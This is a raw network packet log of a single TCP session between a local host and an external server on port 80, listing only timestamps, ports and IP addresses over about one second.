Aug 29, 2024 15:42:58.880644083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880655050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880656958 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880666971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880678892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880693913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880698919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880706072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880718946 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880723953 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880736113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880738020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880753994 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880779028 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880779028 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880788088 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880800009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880812883 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880815983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880827904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880839109 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880848885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880850077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880861044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880872011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880881071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880881071 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880882025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.880904913 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.880928993 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881447077 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881463051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881474018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881486893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881489992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881496906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881505013 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881513119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881525040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881536007 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881537914 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881546974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881558895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881560087 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881570101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881580114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881593943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881594896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881603956 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881614923 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881625891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881634951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881634951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881635904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881648064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881650925 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881659031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881668091 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881670952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881707907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881726027 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881839991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881850004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881860971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.881897926 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.881897926 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.963614941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.963638067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.963650942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.963661909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.963673115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.963684082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.963696957 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.963705063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.963705063 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.963812113 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964015961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964029074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964040995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964056969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964068890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964077950 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964087963 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964088917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964088917 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964092970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964099884 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964107037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964117050 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964154005 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964278936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964291096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964307070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964317083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964328051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964338064 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964339972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964354992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964359045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964373112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964382887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964395046 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964400053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964400053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964406013 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964417934 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964418888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964436054 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964504004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964637995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964649916 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964658976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964668989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964679003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964689970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964699984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964706898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964706898 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964709044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964720011 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964731932 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964731932 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964744091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964760065 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964770079 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964782000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964791059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964791059 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964792967 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964804888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964814901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964823961 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964833021 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964838028 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964845896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964874029 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.964879990 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964921951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.964996099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965007067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965015888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965027094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965035915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965045929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965049982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965055943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965066910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965075970 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965094090 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965111017 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965126991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965140104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965151072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965192080 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965240002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965250015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965257883 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965266943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965277910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965287924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965297937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965301991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965301991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965306997 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965332031 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965347052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965609074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965620995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965631008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965641975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965652943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965656996 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965665102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965676069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965686083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965696096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965707064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965708971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965708971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965719938 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965740919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965769053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965888977 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965898991 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965909004 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965913057 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965934992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965938091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965950966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965953112 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965962887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965981960 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.965985060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.965997934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966007948 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966011047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966028929 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966039896 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966047049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966058969 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966062069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966074944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966087103 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966090918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966098070 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966109037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966109037 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966120958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966131926 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966135025 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966144085 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966156960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966166019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966166019 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966213942 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966213942 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966382027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966394901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966404915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966419935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966433048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966444016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966454983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966456890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966456890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966466904 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966478109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966481924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966492891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966494083 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966505051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966515064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966525078 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966541052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966543913 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966556072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966557980 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966567993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966576099 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966579914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966593027 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:58.966617107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966617107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.966694117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:58.995589972 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.000551939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238440037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238471985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238483906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238625050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238651991 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238663912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238677025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238703966 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238703966 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238729954 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238751888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238765001 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238775969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238787889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238818884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238818884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238861084 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238867044 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238881111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238890886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238903999 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238917112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238926888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238935947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238935947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238941908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238986969 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238997936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.238997936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.238998890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239012003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239029884 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239032984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239046097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239048004 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239057064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239070892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239108086 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239108086 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239176989 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239195108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239226103 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239267111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239348888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239358902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239370108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239386082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239397049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239401102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239407063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239418030 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239429951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239440918 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239444017 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239444017 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239454031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239478111 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239516020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239643097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239653111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239662886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239674091 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239701033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239727020 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239778042 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239788055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239797115 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239808083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239818096 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239830017 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239830971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239830971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239840984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239886045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239917040 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239927053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239933968 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.239937067 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239947081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239958048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.239969015 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240015984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 29, 2024 15:42:59.240029097 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240039110 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240048885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240058899 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 29, 2024 15:42:59.240070105 CEST	80	49704	185.215.113.100	192.168.2.5
